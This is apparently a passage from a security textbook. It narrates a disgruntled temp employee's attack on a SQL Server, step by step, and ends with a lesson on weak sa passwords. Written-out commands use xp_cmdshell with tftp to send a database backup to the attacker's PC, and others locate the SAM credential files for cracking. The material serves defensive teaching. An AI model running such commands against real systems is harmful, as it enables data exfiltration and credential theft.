| Jimmy has been working for SupaLaptops Direct Inc. for eight months since he graduated. He was hired to do temporary support work, but he figured that with his skills, his boss would surely realize that he was indispensable and keep him on permanently. However, yesterday he found out that he would not be needed past the end of the week. He cannot believe the company would overlook his abilities. After all, he probably has more talent than the rest of the department combined. Well, if these people did not know it now, they soon would, because Jimmy is about to show them what they are throwing away. As a junior member of the team, Jimmy does not have much administrative access, but he knows the database that supports the online ordering system has some valuable data on it. He decides to make this data his. Step 1. | Using the osql tool with the L (list servers) switch, Jimmy discovers that several other SQL servers are on the network in addition to the one he is interested in. Figure 8-14 shows the results of running this command.
Figure 8-14. Results from osql L Command 
Now that Jimmy knows the server is available and the SQL Server service is running, his next task is to gain access to it. He decides to use SQLPing to confirm the details of his target, as shown in Figure 8-15.
Figure 8-15. SQL Ping Utility 
| Step 2. | Jimmy figures he should check whether an sa password exists because so many servers out there have a blank password. Once again, he uses the osql tool to attempt to log in to the SQL server. Figure 8-16 shows that on this occasion, at least the most obvious errors have not been made.
Figure 8-16. Attempt to Log In with Blank sa Password 
| Step 3. | Jimmy pulls out the next tool in his toolkit, SQLDict, and loads an English word list that he obtained from ftp://ftp.ox.ac.uk/pub/wordlists. It takes a little time, but he is in no hurry. Eventually he strikes gold, as Figure 8-17 shows. Now he has the holy grail the sa password and he can log in to the server as sysadmin with full access to all objects and data.
Figure 8-17. Successfully Obtaining the sa Password with SQLDict 
Jimmy can now log in to the server, browse, and damage at will. However, he figures it would be more useful to get his hands on the actual data files.
| Step 4. | To find out which databases are available to him, Jimmy interrogates the system table sysdatabases using osql. Figure 8-18 shows a successful login to the server using the newly found sa password and a subsequent query to discover the names of the databases on the SQL server. Not only does Jimmy locate some interesting-sounding databases like Customers, but he also notices that the sample databases Northwind and pubs are still in evidence.
Figure 8-18. Query on sysdatabases Table 
Now Jimmy knows which databases he needs to target. The easiest way to obtain data files is to find the database backup files. Although backups usually go to tape, it is common to back up SQL Server databases to disk initially and then to back up the disk to tape. Backups to disk are considerably quicker, and the cost of disk space is relatively small.
| Step 5. | Using a stored procedure sp_helpdevice, Jimmy quickly discovers the location of the backups on disk. Only the formality of copying the files remains, and this he accomplishes by using the xp_cmdshell stored procedure and TFTP in this way:
xp_cmdshell 'tftp JimmyPC PUT "C:\Program Files\Microsoft SQL Server\MSSQL\Backup\Orders.BAK"'
Mission accomplished! Jimmy has a copy of the Orders database, which he can restore at his leisure to another SQL server. More than this, he has succeeded in transferring this backup file without anything appearing in an event log, and without the need for authentication.
| Step 6. | Knowing that the usefulness of xp_cmdshell stretches far beyond databases, Jimmy thinks it also would be nice to have a copy of the SAM database from this computer. He runs the xp_cmdshell again:
xp_cmdshell 'dir c:\WINNT\system32\repair'
Note The SAM file is an operating system file containing details of all local users and their passwords. An unlocked backup copy can be found in the repair directory. Jimmy gets a file listing confirming that the two files he is interested in are in their expected location. (See Figure 8-19.)
Figure 8-19. Directory Listing Using xp_cmdshell 
| Step 7. | Jimmy plans to use a password brute forcing tool to gain the Administrator password. He knows that he will probably need both the SAM and SECURITY files to do this. Using the tftp command again, he copies these files to his local machine.
|
Note Password cracking is covered fully in Chapter 9, "Cracking Passwords." There, you will see another tool called pwdump that you can use to extract usernames and passwords from an active SAM file.
Jimmy now has a copy of one of the most critical databases in the company, and ultimately the means to access the database server as an administrator at any time. The company probably thought that giving a junior and temporary member of staff limited privileges to its systems would be safe. However, the company error was in assuming that SQL Server security was adequate to protect its data. Although the company did not leave the sa account with a blank password, the one it had used was a short and simple one, easily brute forced with a dictionary attack. It is useless to have a high-security lock if the key is under the doormat. Even if it is impossible to make a system impenetrable, if the job would have been slower and trickier, Jimmy would have been more likely to give up, and only the most determined hacker would have succeeded. |
